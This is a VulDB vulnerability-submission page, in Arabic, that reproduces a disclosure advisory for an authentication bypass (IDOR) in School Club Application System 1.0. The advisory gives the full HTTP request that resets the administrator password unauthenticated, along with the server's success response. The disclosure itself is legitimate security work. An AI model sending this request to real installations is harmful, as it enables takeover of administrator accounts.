إرسال #34399: School Club Application System (SCAS) 1.0 - Authentication Bypassالمعلومات

عنوان	School Club Application System (SCAS) 1.0 - Authentication Bypass
الوصف	# Exploit Title: School Club Application System (SCAS) 1.0 - Authentication Bypass # Date: 2022-04-09 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ School Club Application System (SCAS) 1.0 - Authentication Bypass Summary: ================ School Club Application System (SCAS) in version 1.0 is vulnerable to bypass authentication by changing administrator password by insecure direct object reference (IDOR) attack, for this reason, attacker can gain full access to administrator account by resetting its password. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Affected Product: ================ School Club Application System v1.0 Steps to Reproduce: ================ Request: POST /scas/classes/Users.php?f=save_user HTTP/1.1 Host: target.com Content-Length: 785 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOJM0GBfl6KS1ELuA Origin: http://target.com Referer: http://target.com/scas/admin/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="firstname" Administrator ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="password" H4ck3d@ ------WebKitFormBoundaryOJM0GBfl6KS1ELuA Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryOJM0GBfl6KS1ELuA-- Response: HTTP/1.1 200 OK Date: Sat, 09 Apr 2022 15:16:38 GMT Server: Apache/2.4.52 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"}
المصدر	⚠️ https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html
المستخدم	mrempy (UID 24379)
ارسال	09/04/2022 05:32 PM (4 سنوات منذ)
الاعتدال	09/04/2022 08:16 PM (3 hours later)
الحالة	تمت الموافقة
إدخال VulDB	196750 [School Club Application System 1.0 Users.php?f=save_user تجاوز الصلاحيات]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!